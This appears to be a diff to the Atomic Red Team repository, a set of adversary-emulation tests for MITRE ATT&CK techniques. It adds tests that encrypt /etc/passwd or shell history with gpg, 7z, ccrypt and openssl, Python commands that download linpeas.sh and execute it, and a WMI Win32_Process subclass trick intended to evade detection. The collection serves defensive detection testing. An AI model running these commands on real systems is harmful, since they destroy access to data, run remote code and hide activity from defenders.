+          description: path to the encrypted file
+          type: Path
+          default: "/tmp/passwd.gpg"
+        input_file_path:
+          description: path to the file that you want to encrypt
+          type: Path
+          default: "/etc/passwd"
+        encryption_alg:
+          description: encryption algorithm of the file
+          type: String
+          default: AES-256
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Finds where gpg is located
+
+'
+        prereq_command: 'which_gpg=`which gpg`
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd
+          0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
+
+'
+        cleanup_command: 'rm #{encrypted_file_path}
+
+'
+    - name: Encrypt files using 7z (Linux)
+      auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
+      description: 'Uses 7z to encrypt a file
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        pwd_for_encrypted_file:
+          description: the password that you want for the encrypted file
+          type: String
+          default: passwd
+        encrypted_file_path:
+          description: path to the encrypted file
+          type: Path
+          default: "/tmp/passwd.zip"
+        input_file_path:
+          description: path to the file that you want to encrypt
+          type: Path
+          default: "/etc/passwd"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Finds where 7z is located
+
+'
+        prereq_command: 'which_7z=`which 7z`
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}\n"
+        cleanup_command: |
+          $which_7z e #{encrypted_file_path}
+          rm #{encrypted_file_path}
+    - name: Encrypt files using ccrypt (Linux)
+      auto_generated_guid: '08cbf59f-85da-4369-a5f4-049cffd7709f'
+      description: 'Attempts to encrypt data on target systems as root to simulate
+        an inturruption authentication to target system. If root permissions are not
+        available then attempts to encrypt data within user''s home directory.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        cped_file_path:
+          description: path where you want your copied file to be
+          type: Path
+          default: "/tmp/passwd"
+        root_input_file_path:
+          description: path to the file that you want to be encrypted if you are root
+            user
+          type: Path
+          default: "/etc/passwd"
+        user_input_file_path:
+          description: path to file that you want to be encrypted if you are normal
+            user
+          type: Path
+          default: "~/.bash_history"
+        impact_command:
+          description: command to show impact of encryption
+          type: String
+          default: sudo su
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Finds where ccencrypt and ccdecrypt is located and copies input
+          file
+
+'
+        prereq_command: |
+          which_ccencrypt=`which ccencrypt`
+          which_ccdecrypt=`which ccdecrypt`
+          if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path};
+          file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt
+          #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command};
+          fi
+
+'
+        cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path};
+          else cp #{cped_file_path} #{user_input_file_path}; fi \n"
+    - name: Encrypt files using openssl (Linux)
+      auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
+      description: 'Uses openssl to encrypt a file
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        private_key_path:
+          description: path to the private key
+          type: Path
+          default: "/tmp/key.pem"
+        public_key_path:
+          description: path to the public key
+          type: Path
+          default: "/tmp/pub.pem"
+        encryption_bit_size:
+          description: size of the bit of encryption
+          type: Integer
+          default: 2048
+        encrypted_file_path:
+          description: path to the encrypted file
+          type: Path
+          default: "/tmp/passwd.zip"
+        input_file_path:
+          description: path to the file that you want to encrypt
+          type: Path
+          default: "/etc/passwd"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Finds where openssl is located
+
+'
+        prereq_command: 'which_openssl=`which openssl`
+
+'
+        get_prereq_command: ''
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          $which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
+          $which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
+          $which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}
+        cleanup_command: |
+          $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
+          rm #{encrypted_file_path}
   T1565:
     technique:
       external_references:
@@ -48754,7 +49069,7 @@ discovery:
         command: 'cscript #{vbscript}'
         name: powershell
         elevation_required: false
-    - name: Environment variables discovery
+    - name: Environment variables discovery on windows
       auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
       description: 'Identify all environment variables. Upon execution, environments
         variables and your path info will be displayed.
@@ -48767,6 +49082,20 @@ discovery:
 
 '
         name: command_prompt
+    - name: Environment variables discovery on macos and linux
+      auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
+      description: 'Identify all environment variables. Upon execution, environments
+        variables and your path info will be displayed.
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      executor:
+        command: 'env
+
+'
+        name: sh
   T1016:
     technique:
       id: attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
@@ -54884,7 +55213,167 @@ execution:
       - Linux
       - Windows
       - macOS
-    atomic_tests: []
+      identifier: T1059.006
+    atomic_tests:
+    - name: Execute shell script via python's command mode arguement
+      auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+      description: Download and execute shell script and write to file then execute
+        locally using Python -c (command mode)
+      supported_platforms:
+      - linux
+      input_arguments:
+        script_url:
+          description: Shell script public URL
+          type: String
+          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        payload_file_name:
+          description: Name of shell script downloaded from the script_url
+          type: String
+          default: T1059.006-payload
+        executor:
+          description: Linux shell
+          type: String
+          default: sh
+        script_args:
+          description: Arguments to check for system stats, available software, process
+            details, environment paths, open sockets, and interesting files.
+          type: String
+          default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
+            IntFiles"
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify if python is in the environment variable path and attempt
+          to import requests library.
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: 'pip install requests
+
+'
+      executor:
+        command: '$which_python -c ''import requests;import os;url = "#{script_url}";malicious_command
+          = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source
+          = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)''
+
+'
+        name: sh
+        cleanup_command: "rm #{payload_file_name}  \n"
+    - name: Execute Python via scripts (Linux)
+      auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+      description: Create Python file (.py) that downloads and executes shell script
+        via executor arguments
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_script_name:
+          description: Python script name
+          type: Path
+          default: T1059.006.py
+        script_url:
+          description: Shell script public URL
+          type: String
+          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        payload_file_name:
+          description: Shell script file name downloaded from the script_url
+          type: String
+          default: T1059.006-payload
+        executor:
+          description: Payload or script interpreter / executor
+          type: String
+          default: sh
+        script_args:
+          description: Arguments to check for system stats, available software, process
+            details, environment paths, open sockets, and interesting files
+          type: String
+          default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
+            IntFiles"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: "pip install requests    \n"
+      executor:
+        command: |
+          echo 'import requests' > #{python_script_name}
+          echo 'import os' >> #{python_script_name}
+          echo 'url = "#{script_url}"' >> #{python_script_name}
+          echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+          echo 'session = requests.session()' >> #{python_script_name}
+          echo 'source = session.get(url).content' >> #{python_script_name}
+          echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+          echo 'fd.write(source)' >> #{python_script_name}
+          echo 'fd.close()' >> #{python_script_name}
+          echo 'os.system(malicious_command)' >> #{python_script_name}
+          $which_python #{python_script_name}
+        name: sh
+        cleanup_command: "rm #{python_script_name} #{payload_file_name}  \n"
+    - name: Execute Python via Python executables (Linux)
+      auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+      description: 'Create Python file (.py) then compile to binary (.pyc) that downloads
+        an external malicious script then executes locally using the supplied executor
+        and arguments
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_script_name:
+          description: Name of Python script name
+          type: Path
+          default: T1059.006.py
+        script_url:
+          description: URL hosting external malicious payload
+          type: String
+          default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+        payload_file_name:
+          description: Shell script file name downloaded from the script_url
+          type: String
+          default: T1059.006-payload
+        executor:
+          description: Payload or script interpreter / executor
+          type: String
+          default: sh
+        script_args:
+          description: Arguments to check for system stats, available software, process
+            details, environment paths, open sockets, and interesting files
+          type: String
+          default: "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI,
+            IntFiles"
+        python_binary_name:
+          description: Name of Python file to be compiled
+          type: Path
+          default: T1059.006.pyc
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Requires Python
+
+'
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: "pip install requests    \n"
+      executor:
+        command: |
+          echo 'import requests' > #{python_script_name}
+          echo 'import os' >> #{python_script_name}
+          echo 'url = "#{script_url}"' >> #{python_script_name}
+          echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+          echo 'session = requests.session()' >> #{python_script_name}
+          echo 'source = session.get(url).content' >> #{python_script_name}
+          echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+          echo 'fd.write(source)' >> #{python_script_name}
+          echo 'fd.close()' >> #{python_script_name}
+          echo 'os.system(malicious_command)' >> #{python_script_name}
+          $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
+          $which_python #{python_binary_name}
+        name: sh
+        cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
+
+'
   T1053.005:
     technique:
       external_references:
@@ -56324,6 +56813,33 @@ execution:
 
 '
         name: command_prompt
+    - name: Create a Process using obfuscated Win32_Process
+      auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
+      description: |
+        This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
+        [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
+      supported_platforms:
+      - windows
+      input_arguments:
+        new_class:
+          description: Derived class name
+          type: String
+          default: Win32_Atomic
+        process_to_execute:
+          description: Name or path of process to execute.
+          type: String
+          default: notepad.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
+          $NewClass = $Class.Derive("#{new_class}")
+          $NewClass.Put()
+          Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
+        cleanup_command: |
+          $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
+          $CleanupClass.Delete()
 lateral-movement:
   T1550.001:
     technique:
@@ -62449,7 +62965,7 @@ initial-access:
           type: String
           default: guest
         guest_password:
-          description: Specigy the guest password
+          description: Specify the guest password
           type: String
           default: Password123!
       executor:

atomics/T1047/T1047.md

@@ -20,6 +20,8 @@ An adversary can use WMI to interact with local and remote systems and use it as
 
 - [Atomic Test #7 - Create a Process using WMI Query and an Encoded Command](#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command)
 
+- [Atomic Test #8 - Create a Process using obfuscated Win32_Process](#atomic-test-8---create-a-process-using-obfuscated-win32_process)
+
 
 <br/>
 
@@ -231,4 +233,43 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Create a Process using obfuscated Win32_Process
+This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
+[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| new_class | Derived class name | String | Win32_Atomic|
+| process_to_execute | Name or path of process to execute. | String | notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
+$NewClass = $Class.Derive("#{new_class}")
+$NewClass.Put()
+Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
+```
+
+#### Cleanup Commands:
+```powershell
+$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
+$CleanupClass.Delete()
+```
+
+
+
+
+
 <br/>

atomics/T1047/T1047.yaml

@@ -122,3 +122,30 @@ atomic_tests:
     command: |
       powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
     name: command_prompt
+- name: Create a Process using obfuscated Win32_Process
+  auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
+  description: |
+    This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
+    [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
+  supported_platforms:
+  - windows
+  input_arguments:
+    new_class:
+      description: Derived class name
+      type: String
+      default: Win32_Atomic
+    process_to_execute:
+      description: Name or path of process to execute.
+      type: String
+      default: notepad.exe
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
+      $NewClass = $Class.Derive("#{new_class}")
+      $NewClass.Put()
+      Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
+    cleanup_command: |
+      $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
+      $CleanupClass.Delete()

atomics/T1059.006/T1059.006.md

@@ -0,0 +1,186 @@
+# T1059.006 - Python
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/006)
+<blockquote>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
+
+Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute shell script via python's command mode arguement](#atomic-test-1---execute-shell-script-via-pythons-command-mode-arguement)
+
+- [Atomic Test #2 - Execute Python via scripts (Linux)](#atomic-test-2---execute-python-via-scripts-linux)
+
+- [Atomic Test #3 - Execute Python via Python executables (Linux)](#atomic-test-3---execute-python-via-python-executables-linux)
+
+
+<br/>
+
+## Atomic Test #1 - Execute shell script via python's command mode arguement
+Download and execute shell script and write to file then execute locally using Python -c (command mode)
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
+| executor | Linux shell | String | sh|
+| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
+```
+
+#### Cleanup Commands:
+```sh
+rm #{payload_file_name}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Verify if python is in the environment variable path and attempt to import requests library.
+##### Check Prereq Commands:
+```sh
+which_python=`which python`; python -V
+$which_python -c 'import requests' 2>/dev/null; echo $? 
+```
+##### Get Prereq Commands:
+```sh
+pip install requests
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Execute Python via scripts (Linux)
+Create Python file (.py) that downloads and executes shell script via executor arguments
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| python_script_name | Python script name | Path | T1059.006.py|
+| script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| payload_file_name | Shell script file name downloaded from the script_url | String | T1059.006-payload|
+| executor | Payload or script interpreter / executor | String | sh|
+| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo 'import requests' > #{python_script_name}
+echo 'import os' >> #{python_script_name}
+echo 'url = "#{script_url}"' >> #{python_script_name}
+echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+echo 'session = requests.session()' >> #{python_script_name}
+echo 'source = session.get(url).content' >> #{python_script_name}
+echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+echo 'fd.write(source)' >> #{python_script_name}
+echo 'fd.close()' >> #{python_script_name}
+echo 'os.system(malicious_command)' >> #{python_script_name}
+$which_python #{python_script_name}
+```
+
+#### Cleanup Commands:
+```sh
+rm #{python_script_name} #{payload_file_name}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+which_python=`which python`; python -V
+$which_python -c 'import requests' 2>/dev/null; echo $? 
+```
+##### Get Prereq Commands:
+```sh
+pip install requests
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Execute Python via Python executables (Linux)
+Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| python_script_name | Name of Python script name | Path | T1059.006.py|
+| script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
+| payload_file_name | Shell script file name downloaded from the script_url | String | T1059.006-payload|
+| executor | Payload or script interpreter / executor | String | sh|
+| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | String | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
+| python_binary_name | Name of Python file to be compiled | Path | T1059.006.pyc|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo 'import requests' > #{python_script_name}
+echo 'import os' >> #{python_script_name}
+echo 'url = "#{script_url}"' >> #{python_script_name}
+echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+echo 'session = requests.session()' >> #{python_script_name}
+echo 'source = session.get(url).content' >> #{python_script_name}
+echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+echo 'fd.write(source)' >> #{python_script_name}
+echo 'fd.close()' >> #{python_script_name}
+echo 'os.system(malicious_command)' >> #{python_script_name}
+$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
+$which_python #{python_binary_name}
+```
+
+#### Cleanup Commands:
+```sh
+rm #{python_binary_name} #{python_script_name} #{payload_file_name}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+which_python=`which python`; python -V
+$which_python -c 'import requests' 2>/dev/null; echo $? 
+```
+##### Get Prereq Commands:
+```sh
+pip install requests
+```
+
+
+
+
+<br/>

atomics/T1059.006/T1059.006.yaml

@@ -0,0 +1,147 @@
+attack_technique: T1059.006
+display_name: 'Command and Scripting Interpreter: Python'
+atomic_tests: 
+  - name: Execute shell script via python's command mode arguement
+    auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+    description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      script_url: 
+        description: Shell script public URL
+        type: String
+        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+      payload_file_name: 
+        description: Name of shell script downloaded from the script_url
+        type: String
+        default: T1059.006-payload
+      executor: 
+        description: Linux shell
+        type: String
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.  
+        type: String
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+    dependency_executor_name: sh
+    dependencies: 
+      - description: Verify if python is in the environment variable path and attempt to import requests library.
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests
+    executor: 
+      command: |
+        $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
+      name: sh
+      cleanup_command: |
+        rm #{payload_file_name}  
+  - name: 'Execute Python via scripts (Linux)'
+    auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+    description: Create Python file (.py) that downloads and executes shell script via executor arguments
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      python_script_name: 
+        description: Python script name
+        type: Path
+        default: T1059.006.py
+      script_url: 
+        description: Shell script public URL
+        type: String
+        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+      payload_file_name: 
+        description: Shell script file name downloaded from the script_url
+        type: String
+        default: T1059.006-payload
+      executor: 
+        description: Payload or script interpreter / executor
+        type: String
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+        type: String
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+    dependency_executor_name: sh
+    dependencies: 
+      - description: |
+          Requires Python
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests    
+    executor: 
+      command: |
+        echo 'import requests' > #{python_script_name}
+        echo 'import os' >> #{python_script_name}
+        echo 'url = "#{script_url}"' >> #{python_script_name}
+        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+        echo 'session = requests.session()' >> #{python_script_name}
+        echo 'source = session.get(url).content' >> #{python_script_name}
+        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+        echo 'fd.write(source)' >> #{python_script_name}
+        echo 'fd.close()' >> #{python_script_name}
+        echo 'os.system(malicious_command)' >> #{python_script_name}
+        $which_python #{python_script_name}
+      name: sh
+      cleanup_command: |
+        rm #{python_script_name} #{payload_file_name}  
+  - name: 'Execute Python via Python executables (Linux)'
+    auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+    description: |
+      Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      python_script_name: 
+        description: Name of Python script name
+        type: Path
+        default: T1059.006.py
+      script_url: 
+        description: URL hosting external malicious payload
+        type: String
+        default: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+      payload_file_name: 
+        description: Shell script file name downloaded from the script_url
+        type: String
+        default: T1059.006-payload
+      executor: 
+        description: Payload or script interpreter / executor
+        type: String
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+        type: String
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+      python_binary_name: 
+        description: Name of Python file to be compiled
+        type: Path
+        default: T1059.006.pyc
+    dependency_executor_name: sh
+    dependencies: 
+      - description: |
+          Requires Python
+        prereq_command: |
+          which_python=`which python`; python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests    
+    executor: 
+      command: |
+        echo 'import requests' > #{python_script_name}
+        echo 'import os' >> #{python_script_name}
+        echo 'url = "#{script_url}"' >> #{python_script_name}
+        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+        echo 'session = requests.session()' >> #{python_script_name}
+        echo 'source = session.get(url).content' >> #{python_script_name}
+        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+        echo 'fd.write(source)' >> #{python_script_name}
+        echo 'fd.close()' >> #{python_script_name}
+        echo 'os.system(malicious_command)' >> #{python_script_name}
+        $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
+        $which_python #{python_binary_name}
+      name: sh
+      cleanup_command: |
+        rm #{python_binary_name} #{python_script_name} #{payload_file_name}

atomics/T1078.001/T1078.001.md

@@ -23,7 +23,7 @@ After execution the Default Guest account will be enabled (Active) and added to
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | guest_user | Specify the guest account | String | guest|
-| guest_password | Specigy the guest password | String | Password123!|
+| guest_password | Specify the guest password | String | Password123!|
 
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 

atomics/T1078.001/T1078.001.yaml

@@ -12,7 +12,7 @@ atomic_tests:
       type: String
       default: guest
     guest_password:
-      description: Specigy the guest password
+      description: Specify the guest password
       type: String
       default: Password123!
   executor:

atomics/T1082/T1082.md

@@ -26,7 +26,9 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
 
 - [Atomic Test #9 - Griffon Recon](#atomic-test-9---griffon-recon)
 
-- [Atomic Test #10 - Environment variables discovery](#atomic-test-10---environment-variables-discovery)
+- [Atomic Test #10 - Environment variables discovery on windows](#atomic-test-10---environment-variables-discovery-on-windows)
+
+- [Atomic Test #11 - Environment variables discovery on macos and linux](#atomic-test-11---environment-variables-discovery-on-macos-and-linux)
 
 
 <br/>
@@ -282,7 +284,7 @@ cscript #{vbscript}
 <br/>
 <br/>
 
-## Atomic Test #10 - Environment variables discovery
+## Atomic Test #10 - Environment variables discovery on windows
 Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
 
 **Supported Platforms:** Windows
@@ -303,4 +305,28 @@ set
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Environment variables discovery on macos and linux
+Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
+
+**Supported Platforms:** macOS, Linux
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+env
+```
+
+
+
+
+
+
 <br/>

atomics/T1082/T1082.yaml

@@ -126,7 +126,7 @@ atomic_tests:
     command: 'cscript #{vbscript}'
     name: powershell
     elevation_required: false
-- name: Environment variables discovery
+- name: Environment variables discovery on windows
   auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
   description: |
     Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
@@ -136,3 +136,14 @@ atomic_tests:
     command: |
       set
     name: command_prompt
+- name: Environment variables discovery on macos and linux
+  auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
+  description: |
+    Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
+  supported_platforms:
+  - macos
+  - linux
+  executor:
+    command: |
+      env
+    name: sh

atomics/T1486/T1486.md

@@ -0,0 +1,215 @@
+# T1486 - Data Encrypted for Impact
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1486)
